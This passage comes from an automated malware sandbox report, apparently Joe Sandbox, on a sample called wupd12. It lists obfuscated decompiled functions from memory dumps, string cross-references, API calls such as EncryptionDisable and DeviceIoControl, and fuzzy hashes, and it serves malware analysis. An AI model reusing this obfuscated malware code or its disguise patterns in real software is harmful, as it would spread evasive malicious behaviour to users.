				signed int _t109;
				signed int _t110;
				void* _t119;
				signed int _t121;
				void* _t127;

				_t110 = _t109;
				 *(__ebx + 0x4033c8) =  *(__ebx + 0x4033c8) & _t110;
				 *(__ebx + 0x4033c8) =  *(__ebx + 0x4033c8) | 0x0000f60e;
				 *(__ebx + 0x4033c8) =  *(__ebx + 0x4033c8) - 0x32b;
				_v8 = _v8 ^ 0x0000f963;
				_v8 = _v8 & 0x00000000;
				_v8 = 0x926c;
				_t121 = _t119 + 1 - 1;
				 *(__ebx + 0x4033cc) =  *(__ebx + 0x4033cc) - 0xc925;
				 *(__ebx + 0x4033cc) =  *(__ebx + 0x4033cc) ^ _t121;
				E004C3275(0xffffffffffff9188 + (_t127 + 0x00001ab6 ^ _t110) - 1, __ebx, __eflags,  *((intOrPtr*)(__ebx + 0x4038b0)),  *((intOrPtr*)(__ebx + 0x4038ac)),  *((intOrPtr*)(__ebx + 0x4038a8)));
				_v8 = _v8 - 1;
				_v12 = _v12 | (E004C9539(0x4010 + _a4, __ebx, _v8 & _t121,  *((intOrPtr*)(__ebx + 0x499384))) + 0x00004156 ^ 0x00001d84) - 0x0000c64e;
				E004CCA02((E004C9539(0x4010 + _a4, __ebx, _v8 & _t121,  *((intOrPtr*)(__ebx + 0x499384))) + 0x00004156 ^ 0x00001d84) - 0xc64e, __ebx, _v8 & _t121,  *((intOrPtr*)(__ebx + 0x499388)));
				 *(__ebx + 0x4033cc) =  *(__ebx + 0x4033cc) + 1;
				 *(__ebx + 0x4033c8) = 0xe622;
				_a4 = _a4 & 0x00005f56;
				_a8 = _a8 - ((_t121 & _t110 + _a8) - _v8 ^ 0x00000000);
				_v12 = _v12 + 1;
				 *(__ebx + 0x4033c8) =  *(__ebx + 0x4033c8) + 1;
				 *(__ebx + 0x4033c8) =  *(__ebx + 0x4033c8) + 1;
				 *(__ebx + 0x4033c8) = 0xb0c4;
				_a4 = _a4 + 1;
				 *(__ebx + 0x4033cc) =  *(__ebx + 0x4033cc) | 0x0000c41a;
				_a8 = 0;
				_a8 = _a8 + 1;
				_a4 = 0xcab1;
				 *(__ebx + 0x4033cc) =  *(__ebx + 0x4033cc) & 0x0000c41a;
				_v12 = 0xd1e6;
				return 0x2a7d;
			}

0x004ca20e
0x004ca210
0x004ca21c
0x004ca22b
0x004ca23b
0x004ca24d
0x004ca254
0x004ca25b
0x004ca25c
0x004ca266
0x004ca27e
0x004ca299
0x004ca2d2
0x004ca2db
0x004ca2e5
0x004ca2ee
0x004ca303
0x004ca30a
0x004ca31a
0x004ca320
0x004ca326
0x004ca32c
0x004ca356
0x004ca361
0x004ca375
0x004ca378
0x004ca37b
0x004ca382
0x004ca388
0x004ca3a2

Strings

", xrefs: 004CA2EE
V_, xrefs: 004CA303

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: "$V_
API String ID: 0-2007109525
Opcode ID: 77ea479eb55ed650b88523d0b7d0b12d0a87fe0f21161e7c40fd4661444448c7
Instruction ID: d0b8348748d3025d4a6578077623752110d8b64de569e380aa992f4c0f938053
Opcode Fuzzy Hash: 77ea479eb55ed650b88523d0b7d0b12d0a87fe0f21161e7c40fd4661444448c7
Instruction Fuzzy Hash: C5415132920605AFFF04CF65C98A7993BB5FF40716F1891A9DC0DAE18ACB3847658F54

Uniqueness

Uniqueness Score: 100.00%

Function 004C3970, Relevance: 2.6, Strings: 2, Instructions: 101
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C3970(void* __eax, void* __ebx, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t81;
				signed int _t84;
				signed int _t90;
				signed int _t93;
				signed int _t103;
				signed int _t110;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t124;
				signed int _t125;
				signed int _t126;

				_v12 = _v12 & 0x0000f921;
				_t120 = _t119 & _t103;
				 *(__ebx + 0x40344c) = _t103;
				 *(__ebx + 0x403448) = 0x45fe;
				_v12 = _v12 - _t103;
				_v12 = 0x6aed;
				 *(__ebx + 0x40344c) =  *(__ebx + 0x40344c) | _t120;
				_t125 = _t124 | _v8;
				_a4 = _a4 + 1;
				_v12 = _v12 + 1;
				_t81 = __eax + 0x1057 & 0x0000bd0b;
				_t126 = _t125 + 1;
				 *(__ebx + 0x40344c) =  *(__ebx + 0x40344c) + _t81;
				_v12 = _v12 - 0xf48f;
				_v12 = _v12 + _t126;
				_v12 = _v12 & _t126;
				_v12 = 0x82fb;
				 *(__ebx + 0x40344c) =  *(__ebx + 0x40344c) ^ _t81 - 0x0000280f ^ 0x00000562;
				_t84 = E004C4E7E(_t81 - 0x0000280f ^ 0x00000562, __ebx,  *((intOrPtr*)(__ebx + 0x403948)));
				 *(__ebx + 0x403448) =  *(__ebx + 0x403448) + 0x1b5e;
				_a4 = _a4 - _t103 + 1 -  *(__ebx + 0x403448);
				_a4 = _a4 ^ 0x0000edbf;
				_a4 = _a4 & 0x00004b2e;
				_t116 = ((_t110 | 0x0000ff7a) - 0x0000c3f4 ^ 0x00000000 |  *(__ebx + 0x403448) | _t120 - _t125) ^  *(__ebx + 0x403448);
				_t90 = ((_t84 ^ 0x000091bd) - 0x00000001 ^ 0x00005b8e) - 0x9b93 + _t116 + 0x7d2a;
				 *(__ebx + 0x403448) =  *(__ebx + 0x403448) + _t116;
				 *(__ebx + 0x40344c) = _t90;
				_v8 = _v8 - 1;
				 *(__ebx + 0x403448) =  *(__ebx + 0x403448) - (_t90 ^ 0xc2e9);
				_t93 = E004CD22B(_t90 ^ 0xc2e9, __ebx,  *((intOrPtr*)(__ebx + 0x49940c)),  *((intOrPtr*)(__ebx + 0x499408)),  *((intOrPtr*)(__ebx + 0x499404)));
				 *(__ebx + 0x40344c) =  *(__ebx + 0x40344c) ^ 0x0000ece6;
				_v12 = _v12 - 1;
				 *(__ebx + 0x403448) =  *(__ebx + 0x403448) + 1;
				_v12 = 0x9a6c;
				 *(__ebx + 0x40344c) = _t126 + 0x0000466b ^ _t116 - 0x00002107;
				 *(__ebx + 0x40344c) =  *(__ebx + 0x40344c) + 1;
				 *(__ebx + 0x40344c) =  *(__ebx + 0x40344c) + 1;
				_v8 = _v8 + 1;
				return (((_t93 ^ 0x00003f12) + 0x0000b64d ^ 0x0000a89d) - 0x00009961 & 0x0000f302 ^ 0x00002047 | 0x000014c6) & 0x00001222;
			}

0x004c397b
0x004c3988
0x004c398a
0x004c3996
0x004c39a0
0x004c39a3
0x004c39aa
0x004c39b0
0x004c39b3
0x004c39b7
0x004c39cd
0x004c39d2
0x004c39d3
0x004c39d9
0x004c39ea
0x004c39ed
0x004c39f0
0x004c39f7
0x004c3a03
0x004c3a08
0x004c3a1a
0x004c3a1d
0x004c3a2b
0x004c3a39
0x004c3a61
0x004c3a66
0x004c3a72
0x004c3a7e
0x004c3a91
0x004c3aa9
0x004c3ab8
0x004c3ad5
0x004c3ad8
0x004c3af7
0x004c3b03
0x004c3b13
0x004c3b19
0x004c3b2b
0x004c3b39

Strings

.K, xrefs: 004C3A2B
j, xrefs: 004C39A3

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: .K$j
API String ID: 0-4012006948
Opcode ID: ceda323f99df0112db05d233c4c39ddc566bcabe944b8f2a1dd17a619c7f9139
Instruction ID: 7e0789a615cb595dc7d7f13b32eacc89d38e7efbba8612c7c53f199607ce5d27
Opcode Fuzzy Hash: ceda323f99df0112db05d233c4c39ddc566bcabe944b8f2a1dd17a619c7f9139
Instruction Fuzzy Hash: 2F41A472814200BBFB018F64C9C569A3F75EF4071AF18C0BADC08AD08AD77D87558F5A

Uniqueness

Uniqueness Score: 100.00%

Function 004C2F44, Relevance: 2.6, Strings: 2, Instructions: 100
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C2F44(void* __eax, void* __ebx, signed int _a4) {
				signed int _v8;
				void* _t86;
				signed int _t88;
				void* _t98;
				signed int _t114;
				void* _t121;
				signed int _t125;
				signed int _t127;

				 *((intOrPtr*)(__ebx + 0x40340c)) =  *((intOrPtr*)(__ebx + 0x40340c)) - 1;
				_v8 = _v8 | 0x000070e0;
				_a4 = _a4 - 1;
				_t86 = E004C4E7E(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x403908)));
				_a4 = _a4 + 1;
				_a4 = _t114;
				_v8 = _v8 - 0x1413;
				_v8 = _v8 - 1;
				_v8 = _v8 + 1;
				 *(__ebx + 0x403408) =  *(__ebx + 0x403408) ^ _t127;
				 *((intOrPtr*)(__ebx + 0x40340c)) = 0x808e;
				_a4 = _a4 + 0xd577;
				_t125 = _t121 + 0x1896a - _v8;
				_t88 = E004CC018(_t86 - 0x7191, __ebx,  *((intOrPtr*)(__ebx + 0x403904)),  *((intOrPtr*)(__ebx + 0x403900)));
				_v8 = 0x9e3b;
				_a4 = _a4 | _t125;
				_a4 = _a4 ^ 0x00009959;
				 *((intOrPtr*)(__ebx + 0x40340c)) =  *((intOrPtr*)(__ebx + 0x40340c)) + 1;
				 *((intOrPtr*)(__ebx + 0x40340c)) = 0xe7d1;
				 *(__ebx + 0x403408) =  *(__ebx + 0x403408) + 0x795f;
				_a4 = _a4 + _t125;
				_v8 = _v8 & _a4;
				_v8 = 0xbae4;
				_v8 = _v8 + 1;
				_a4 = _a4 & 0x00000000;
				 *((intOrPtr*)(__ebx + 0x40340c)) = 0x1bb9;
				_t98 = (((_t88 & (_t114 ^ 0x0000edf8) + 0x00000001) + 0x0000f459 ^ 0xceca) & 0x0000015a ^ 0x0000a520) + 0xb582 - _t125 + 0xc60c;
				_v8 = _v8 ^ 0x00001d87;
				 *((intOrPtr*)(__ebx + 0x40340c)) = 0x3ab1;
				_v8 = _v8 - _t98;
				 *(__ebx + 0x403408) = 0x99c9;
				_a4 = _a4 ^ 0x000084a3;
				_v8 = _v8 ^ 0x00002404;
				return _t98 - 0x0000afe8 ^ 0x00001a8a;
			}

0x004c2f67
0x004c2f70
0x004c2f80
0x004c2f97
0x004c2f9c
0x004c2f9f
0x004c2fa2
0x004c2fa9
0x004c2fac
0x004c2faf
0x004c2fbe
0x004c2fcb
0x004c2fd7
0x004c2fe6
0x004c2feb
0x004c3008
0x004c301c
0x004c3026
0x004c302c
0x004c3036
0x004c3041
0x004c304a
0x004c304d
0x004c3061
0x004c3064
0x004c3093
0x004c309d
0x004c30a2
0x004c30ad
0x004c30bc
0x004c30bf
0x004c30c6
0x004c30cd
0x004c30ee

Strings

_y, xrefs: 004C3036
p, xrefs: 004C2F70

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: _y$p
API String ID: 0-300800615
Opcode ID: 1f12aaba4cd56e4e6c1b4dfab4dcb6cc9c96559aafe2d7e2d7ebc160930f5eef
Instruction ID: 9e881d61faa537cba79f98b4eb4f6ad5772dce45bd8d1fcdd080204aca879aeb
Opcode Fuzzy Hash: 1f12aaba4cd56e4e6c1b4dfab4dcb6cc9c96559aafe2d7e2d7ebc160930f5eef
Instruction Fuzzy Hash: 36415C72D00608EBFB04CF64CA8A69A7FB4FF40355F24C16ADC09AE186C77C9B559B94

Uniqueness

Uniqueness Score: 100.00%

Function 004C3B3C, Relevance: 2.6, Strings: 2, Instructions: 99
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C3B3C(signed int __eax, void* __ebx, intOrPtr _a4, void* _a8, signed int _a12) {
				intOrPtr _v8;
				signed int _v12;
				signed int _t76;
				signed int _t91;
				signed int _t127;

				 *(__ebx + 0x403438) = 0x3753;
				 *(__ebx + 0x403438) = 0xf291;
				_t76 = E004C3970((__eax ^ 0x0000184b) - 0xaf10, __ebx, _a12 & 0x0000d896,  *((intOrPtr*)(__ebx + 0x403940)));
				_a12 = _a12 & _t76;
				 *(__ebx + 0x403438) =  *(__ebx + 0x403438) - 1;
				 *(__ebx + 0x40343c) =  *(__ebx + 0x40343c) ^ _t127;
				 *(__ebx + 0x403438) =  *(__ebx + 0x403438) - 0x2007;
				 *(__ebx + 0x403438) =  *(__ebx + 0x403438) ^ _t76 ^ 0x00006c19;
				 *(__ebx + 0x40343c) =  *(__ebx + 0x40343c) | 0x00006b11;
				_v12 = _v12 - 1;
				_t91 = E004CC1B9((((((_t76 ^ 0x00006c19 | 0x527e) & 0x0000fb75) - 0xffffffffffff8cfc |  *(__ebx + 0x403438)) + 0x0000a5f1 |  *(__ebx + 0x403438)) ^ 0x00000000) & 0x00000be9, __ebx,  *((intOrPtr*)(__ebx + 0x4993f8))) + 0x18558 - 0xe1a3;
				 *(__ebx + 0x40343c) =  *(__ebx + 0x40343c) - 1;
				_v8 = _v8 + 0x9e85;
				 *(__ebx + 0x40343c) =  *(__ebx + 0x40343c) ^ _t91;
				_a12 = _a12 | _t91;
				_v12 = _v12 - 1;
				_a4 = _a4 - 0x4b41;
				_v12 = _v12 - 0xcf3b;
				_v12 = _v12 | 0x000085d3;
				_v12 = _v12 - (_t127 - 0x00000001 ^ 0x00000000) + 1;
				_v8 = _v8 - 0xce0;
				return ((( *(__ebx + 0x403438) ^ 0x000059b2) & 0x400) - 0x0000bff9 ^  *(__ebx + 0x403438) + 0x00000001 & 0x0000f333) + 0x7e41;
			}

0x004c3b50
0x004c3b5a
0x004c3b89
0x004c3b94
0x004c3b9d
0x004c3ba8
0x004c3bc5
0x004c3bcf
0x004c3bd8
0x004c3c05
0x004c3c3d
0x004c3c51
0x004c3c57
0x004c3c61
0x004c3c67
0x004c3c75
0x004c3c78
0x004c3c8a
0x004c3c96
0x004c3cbd
0x004c3cd1
0x004c3cde

Strings

S7, xrefs: 004C3B50
AK, xrefs: 004C3C78

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: AK$S7
API String ID: 0-4190837884
Opcode ID: f55d91a923f182ef51e4b7dadcc96e0b2f566b79c17b5a8a36b56b376aa0ad5d
Instruction ID: 5d0ebf381f8b882cee7d350e204a628da9ec13d6f1694998509929d4f74ac716
Opcode Fuzzy Hash: f55d91a923f182ef51e4b7dadcc96e0b2f566b79c17b5a8a36b56b376aa0ad5d
Instruction Fuzzy Hash: D9410872910745ABFB04CF25C8CA79A7B75FF40315F18817AAC09AE4C6C7BC87A49B54

Uniqueness

Uniqueness Score: 100.00%

Function 004C668E, Relevance: 2.6, Strings: 2, Instructions: 99
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C668E(void* __eax, void* __ebx, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _t90;
				void* _t110;
				signed int _t115;
				signed int _t119;
				signed int _t128;

				_v8 = _v8 ^ 0x00000000;
				 *(__ebx + 0x4032c0) =  *(__ebx + 0x4032c0) - 1;
				 *(__ebx + 0x4032c0) =  *(__ebx + 0x4032c0) + 0x6a0f;
				 *(__ebx + 0x4032c0) =  *(__ebx + 0x4032c0) + 0x395d;
				_t90 = (__eax - 0x00000001 ^ _v8 ^ 0x0000df3b) & 0x000091d3 ^ 0x00009a20;
				_a8 = _t90;
				 *(__ebx + 0x4032c0) =  *(__ebx + 0x4032c0) & 0x000070ce;
				_v8 = _v8 - 0x318d;
				_a4 = _a4 - 0xc589;
				 *(__ebx + 0x4032c4) =  *(__ebx + 0x4032c4) + 0xc0d3;
				 *(__ebx + 0x4032c4) =  *(__ebx + 0x4032c4) - 0xcc04;
				_a12 = _a12 ^ 0x00008fc1;
				 *(__ebx + 0x4032c4) =  *(__ebx + 0x4032c4) & _t128;
				_a4 = _a4 - _t90 - 0xbe6a + 0xc0c6 - 0xffffffffffff6b00;
				_v8 = 0x73ef;
				_v8 = _v8 - 1;
				E004C5366(_t90 - 0xbe6a + 0xc0c6 - 0xfffffffffffecd38, __ebx,  *((intOrPtr*)(__ebx + 0x499238)),  *((intOrPtr*)(__ebx + 0x499234)),  *((intOrPtr*)(__ebx + 0x499230)));
				_a4 = _a4 | 0x0000a508;
				 *(__ebx + 0x4032c4) =  *(__ebx + 0x4032c4) + 1;
				_a4 = _a4 + 1;
				_t119 = (_t115 | 0x00008614) - 0x00000001 & _t110 + _t115;
				 *(__ebx + 0x4032c4) =  *(__ebx + 0x4032c4) + 1;
				 *(__ebx + 0x4032c4) =  *(__ebx + 0x4032c4) & _t119;
				_v8 = _v8 & 0x000086c1;
				_v8 = 0x1a44;
				_a12 = 0x73d4;
				 *(__ebx + 0x4032c0) =  *(__ebx + 0x4032c0) + 0x5ae1;
				_v8 = _v8 & 0x3e00;
				_v8 = 0xe591;
				_a4 = _a4 ^ 0x00000000;
				_a4 = _a4 ^ 0x00000000;
				_v8 = _v8 | 0x3e00;
				_v8 = 0xbc7;
				 *(__ebx + 0x4032c4) =  *(__ebx + 0x4032c4) | 0x0000f203;
				return (0x3e00 + _t119 - 0xffffffffffff3ac4 ^ 0x0000caa6) + 0x0000e77e & 0;
			}

0x004c6699
0x004c66a8
0x004c66b0
0x004c66ce
0x004c66d8
0x004c66dd
0x004c66e3
0x004c66ed
0x004c66fe
0x004c6705
0x004c6726
0x004c6730
0x004c6738
0x004c6745
0x004c6748
0x004c674f
0x004c6772
0x004c677a
0x004c6781
0x004c6797
0x004c679a
0x004c67a2
0x004c67b3
0x004c67b9
0x004c67c0
0x004c67c7
0x004c67ce
0x004c67de
0x004c67eb
0x004c67f2
0x004c6800
0x004c6810
0x004c6819
0x004c682c
0x004c6850

Strings

Z, xrefs: 004C67CE
s, xrefs: 004C6748

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: Z$s
API String ID: 0-215943834
Opcode ID: 472388f2ddbc93c9e219e1d86a9f996b8f7f267963c2a3bd5cd7792ca38ce420
Instruction ID: 3a046c39ee270ef577d21539b92f5312e9cb30cd1e158f753876a5fec9be3cb8
Opcode Fuzzy Hash: 472388f2ddbc93c9e219e1d86a9f996b8f7f267963c2a3bd5cd7792ca38ce420
Instruction Fuzzy Hash: E3414C72931205DBFB05CF64CA4A69E7BB4FB40716F1881EDDC08AA0C6C7789B24DB55

Uniqueness

Uniqueness Score: 100.00%

Function 004D8B38, Relevance: 2.1, Strings: 1, Instructions: 894COMMON

Download Yara Rule

Strings

, xrefs: 004D93BE

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 2dd65a18bffa5cc354b6dec160d8276e2ccccdf46b279a5b3ed6ab7b0280db8f
Instruction ID: cf724783426a726da50bbfa1b3dde648111ef009d384eb48998f335cdd5f9395
Opcode Fuzzy Hash: 2dd65a18bffa5cc354b6dec160d8276e2ccccdf46b279a5b3ed6ab7b0280db8f
Instruction Fuzzy Hash: D972569645E3C11FD3138B745CBAAA2BFB5AF57218B0E41DBC4C08F1A3E648594AC727

Uniqueness

Uniqueness Score: 0.02%

Function 00437560, Relevance: 1.7, Strings: 1, Instructions: 441COMMON

Download Yara Rule

Strings

A, xrefs: 00437ABC

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: 850a4d59d05e805d2538a8f572bcc4308f44e417353ef38283f57074e78716e0
Instruction ID: c6745956521f361ed1c8a725cd30992f269e434d82e2c0db8a4095be6cb52f8c
Opcode Fuzzy Hash: 850a4d59d05e805d2538a8f572bcc4308f44e417353ef38283f57074e78716e0
Instruction Fuzzy Hash: F3020674D19B499FE3239A3894012A7FB985FFB589F55D70FFCE832912E320A9C25244

Uniqueness

Uniqueness Score: 2.38%

Function 004268A0, Relevance: 1.6, APIs: 1, Instructions: 51UNIQUE

Download Yara Rule

APIs

EncryptionDisable.ADVAPI32(004268E3,0000000C), ref: 004268C1

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: DisableEncryption
String ID:
API String ID: 2423663278-0
Opcode ID: 94b1fe6dce325e9ff9d3eb0bc2f2fde97002bf6f25512e5632af36922e909f22
Instruction ID: d8e2e9a7e284257af945370c374e88880e4a7da4934a18695666f2f546b602e4
Opcode Fuzzy Hash: 94b1fe6dce325e9ff9d3eb0bc2f2fde97002bf6f25512e5632af36922e909f22
Instruction Fuzzy Hash: D4115B62A4E3D16FE7270AB06E26742BF705F13711F6A40CBD1809A1E3C16D4A19D76A

Uniqueness

Uniqueness Score: 100.00%

Function 004028C4, Relevance: 1.5, APIs: 1, Instructions: 40UNIQUE

Download Yara Rule

APIs

EncryptionDisable.ADVAPI32 ref: 004028C4

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: DisableEncryption
String ID:
API String ID: 2423663278-0
Opcode ID: 172719fe6b81e772c41cf2583b1c6def049b8325de486a8b64d4e46d9523257c
Instruction ID: f11335aac2b38cbe11c798fe8647ae053caf0344176a2b70c50dbc3eb6227883
Opcode Fuzzy Hash: 172719fe6b81e772c41cf2583b1c6def049b8325de486a8b64d4e46d9523257c
Instruction Fuzzy Hash: 7DF04F2155D3C46FC7024B684E18E333F74EF13704F4909EBE0808B1E3C028A919C322

Uniqueness

Uniqueness Score: 100.00%

Function 00401430, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32(00000000,85892400,00000000,00000000,?,00000004,00000000,00000000), ref: 00401468

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: ControlDevice
String ID:
API String ID: 2352790924-0
Opcode ID: 8f268069e1450092c59afdd14cd6c24aa8dad944eb97837eef7963e10ae3d3bf
Instruction ID: 9ddfd2d61296370899007390b16c6217abec9ddf7ad8b30facd1343808727606
Opcode Fuzzy Hash: 8f268069e1450092c59afdd14cd6c24aa8dad944eb97837eef7963e10ae3d3bf
Instruction Fuzzy Hash: A5F0E570644300AAE7248B64DC01B5B32E46B84B21F40472DFA98A52F0D3B8D848C61A

Uniqueness

Uniqueness Score: 0.45%

Function 00403ECB, Relevance: 1.5, APIs: 1, Instructions: 25UNIQUE

Download Yara Rule

APIs

EncryptionDisable.ADVAPI32 ref: 00403EDA

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: DisableEncryption
String ID:
API String ID: 2423663278-0
Opcode ID: 839aa83a754e5408a25574a112ef042d03607803abbaa3d4623e81bf62e0b1ca
Instruction ID: 4ae3241cdd62fdcd1304258ddb1b8dcf6e0aefb997954b494fa328b9738ba689
Opcode Fuzzy Hash: 839aa83a754e5408a25574a112ef042d03607803abbaa3d4623e81bf62e0b1ca
Instruction Fuzzy Hash: 54F0922544E3CADFC303CBB06C646517F78AE1320175885DBE5C29B1E3E368592AE7A6

Uniqueness

Uniqueness Score: 100.00%

Function 004C3597, Relevance: 1.4, Strings: 1, Instructions: 114UNIQUE

Download Yara Rule

Strings

], xrefs: 004C3708

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: ]
API String ID: 0-636209891
Opcode ID: b74fdca089d13e63305568ce722234934c6217209cac2ff3fd8496ec2667956b
Instruction ID: 30f355164353b85e4eeaf304f9b0283c53f900dc0519d153b344f99f738b07dd
Opcode Fuzzy Hash: b74fdca089d13e63305568ce722234934c6217209cac2ff3fd8496ec2667956b
Instruction Fuzzy Hash: B0519172800204ABFF44CF66C8866997F75FF48316F08816EEC18AD196CB7A47748F68

Uniqueness

Uniqueness Score: 100.00%

Function 004CD770, Relevance: 1.4, Strings: 1, Instructions: 106UNIQUE

Download Yara Rule

Strings

{|, xrefs: 004CD870

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: {|
API String ID: 0-3567357909
Opcode ID: 7e5996951b82ad16423a256a53f4fe3d503d6db8d0991ef12e16f7dda98a2a62
Instruction ID: 9a05a4e099f15f30d97c0990c8d8270bf533717f255d5603562fc9cba24120bb
Opcode Fuzzy Hash: 7e5996951b82ad16423a256a53f4fe3d503d6db8d0991ef12e16f7dda98a2a62
Instruction Fuzzy Hash: 9841B5B2D142059FFB048F24C886B963F75FB40326F18C1BEAC1C9D186D77C96659B98

Uniqueness

Uniqueness Score: 100.00%

Function 004C2D84, Relevance: 1.4, Strings: 1, Instructions: 106UNIQUE

Download Yara Rule

Strings

Z|, xrefs: 004C2DCC

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: Z|
API String ID: 0-1480497718
Opcode ID: b488dc9677d3a719e946ffd7cccee5654130fd56456ea341f9c4e6e8174da038
Instruction ID: 483b3d59a0cf5e796d4b31bfce559bfdba3ee13ed355c2459d87f42ab4455712
Opcode Fuzzy Hash: b488dc9677d3a719e946ffd7cccee5654130fd56456ea341f9c4e6e8174da038
Instruction Fuzzy Hash: 2241B032810104ABFF05CF65C886A9D7B75FF48326F18C1BAEC09AE186C77C86659F94

Uniqueness

Uniqueness Score: 100.00%

Function 004C6B77, Relevance: 1.4, Strings: 1, Instructions: 105UNIQUE

Download Yara Rule

Strings

pI, xrefs: 004C6D0A

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: pI
API String ID: 0-1642500669
Opcode ID: d4a497b3c3af86ae4af21f4a582c5f5c8b7439b0ea49558ac49b0beb20d9d2b0
Instruction ID: 8ef41740d6cece766976308d2d823c5ec1d16a2a1a59e9e3333796b84cfe14a2
Opcode Fuzzy Hash: d4a497b3c3af86ae4af21f4a582c5f5c8b7439b0ea49558ac49b0beb20d9d2b0
Instruction Fuzzy Hash: 55414E72810308AFFF058F66C9896997BB4FF40326F19C1AEEC096D186CB7846659F94

Uniqueness

Uniqueness Score: 100.00%

Function 004C33F4, Relevance: 1.4, Strings: 1, Instructions: 104UNIQUE

Download Yara Rule

Strings

J, xrefs: 004C34DB

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: J
